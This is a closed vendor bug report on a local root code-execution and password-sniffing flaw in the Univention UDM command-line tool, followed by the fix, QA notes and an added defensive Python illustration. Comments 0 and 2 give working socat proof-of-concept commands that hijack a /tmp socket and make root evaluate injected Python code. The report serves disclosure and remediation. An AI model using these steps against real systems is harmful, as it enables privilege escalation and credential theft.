Bug 40422

Summary: local root code execution vulnerability as every user because UDM CLI uses sockets from /tmp/
Product: UCS
Reporter: Florian Best <best>
Component: UDM - CLI
Assignee: Florian Best <best>
Status: CLOSED FIXED
QA Contact: Philipp Hahn <hahn>
Severity: critical
Priority: P5
CC: gohmann
Version: UCS 4.1
Target Milestone: UCS 4.1-2-errata
Hardware: Other
OS: Linux
See Also: https://forge.univention.org/bugzilla/show_bug.cgi?id=20610
https://forge.univention.org/bugzilla/show_bug.cgi?id=33224
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score:

Description Florian Best univentionstaff 2016-01-13 11:21:57 CET
As the UDM-CLI tool connects to UNIX sockets in /tmp/, everybody is able to "play" CLI server.

For example the user "nobody" may create that unix socket and just needs to wait for the Administrator or a joinscript/postinst/whatever to send requests to that socket. It allows a MITM attack, e.g. to sniff the password.

nobody@master:~$ mkdir /tmp/admincli_0
nobody@master:~$ socat unix-listen:/tmp/admincli_0/sock stdout
['/usr/sbin/udm', 'users/user', 'modify', '--dn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--set', 'password=foo', '--binddn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--bindpw', 'univention']

As the password is in the process list anyway, this is not more critical than a user having access to the system (e.g. due to Bug #39678 comment 7).
Comment 1 Florian Best univentionstaff 2016-01-13 11:23:18 CET
[DoS]: Therefore "nobody" is able to completely block every UDM-CLI call forever.
Comment 2 Florian Best univentionstaff 2016-06-23 18:38:10 CEST
And another thing is that code is executed which is sent to the socket, in both directions:

→ Let user 'root' execute code (logged in as user nobody):
# su nobody
nobody:/$ mkdir /tmp/admincli_0
nobody:/$ printf "__import__('os').system('touch /tmp/evaled')\x00" | socat unix-listen:/tmp/admincli_0/sock stdin
nobody:/$ ls -l /tmp/evaled 
-rw-r--r-- 1 root root 0 Jun 23 18:35 /tmp/evaled

→ Execute code on the server (harmless, as the same user):
printf "__import__('os').system('touch /tmp/evaled')\x00" | socat stdin unix-connect:/tmp/admincli_65534/sock
Comment 3 Florian Best univentionstaff 2016-06-23 20:00:58 CEST
* Code is now evaluated with ast.literal_eval().
* Sockets are checked to verify that the uid is the same as the current/calling UID.
→ Should we also check permissions here?
* If the connection fails, it is retried with a socket name containing random values, to prevent someone from making UDM unusable for non-root users.

univention-directory-manager-modules (11.0.3-17):
r70594 | Bug #40422: fix local root code execution and MITM vulnerability
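As an added illustration (not part of this bug's patch or of Univention's code) of the two checks comment 3 describes: refusing a socket in a shared directory unless the calling uid owns it, and parsing requests with ast.literal_eval so that a payload like the one in comment 2 is rejected instead of run. The socket path and request bytes below are constructed for the demonstration.

```python
import ast
import os
import socket
import stat
import tempfile


def socket_owned_by(path, uid):
    """True only if `path` is a UNIX socket (not a symlink) owned by `uid`.

    In a world-writable directory such as /tmp any user can pre-create the
    expected name, so the client must verify ownership before talking to it.
    """
    try:
        st = os.lstat(path)  # lstat: never follow a planted symlink
    except FileNotFoundError:
        return False
    return stat.S_ISSOCK(st.st_mode) and st.st_uid == uid


def parse_request(raw):
    """Parse one NUL-terminated request as a Python literal.

    ast.literal_eval only accepts literals (lists, strings, numbers, ...); a
    call expression such as __import__(...) raises ValueError rather than
    executing, which is the difference between eval() and literal_eval().
    Returns the argument list, or None if the payload is not a list of str.
    """
    text = raw.rstrip(b"\x00").decode("utf-8", "replace")
    try:
        value = ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return None
    if isinstance(value, list) and all(isinstance(a, str) for a in value):
        return value
    return None


def demo():
    """Bind a socket as the current user and run both checks on constructed data."""
    tmp = tempfile.mkdtemp()
    path = os.path.join(tmp, "sock")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(path)
    own = socket_owned_by(path, os.getuid())        # our own socket: accepted
    other = socket_owned_by(path, os.getuid() + 1)  # another uid's socket: refused
    srv.close()
    os.unlink(path)
    os.rmdir(tmp)
    good = parse_request(b"['/usr/sbin/udm', 'users/user', 'list']\x00")
    bad = parse_request(b"__import__('os').system('touch /tmp/evaled')\x00")
    return own, other, good, bad
```

`demo()` returns `(True, False, ['/usr/sbin/udm', 'users/user', 'list'], None)`: the ownership check accepts only the caller's own socket, and the comment 2 payload is rejected without being executed.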
Comment 4 Philipp Hahn univentionstaff 2016-06-28 11:22:53 CEST
OK: r70594
OK: udm modules
OK: su -c '/usr/sbin/udm users/user' Administrator
OK: mkdir /tmp/admincli_2002;touch /tmp/admincli_200/socket{,.run};time su -c '/usr/sbin/udm users/user' Administrator # delayed ~30s

FYI: A user-visible progress indicator would be nice, as those 30s massively delay CLI usage; bash-completion seems to be broken.

FIXED: univention-directory-manager-modules.yaml
 r70667 | Bug #40422 et al: UDM YAML
OK: errata-announce -V --only univention-directory-manager-modules.yaml
Comment 5 Florian Best univentionstaff 2016-06-28 11:29:46 CEST
(In reply to Philipp Hahn from comment #4)
> FYI: A user-visible progress indicator would be nice, as those 30s massively delay
> CLI usage; bash-completion seems to be broken.
Yes, I saw this, too. I see no reason to wait 30 seconds. I'll add a note to Bug #33224.
Comment 6 Florian Best univentionstaff 2016-06-29 16:43:21 CEST
*** Bug 37604 has been marked as a duplicate of this bug. ***
Comment 7 Janek Walkenhorst univentionstaff 2016-07-07 14:31:29 CEST
<http://errata.software-univention.de/ucs/4.1/208.html>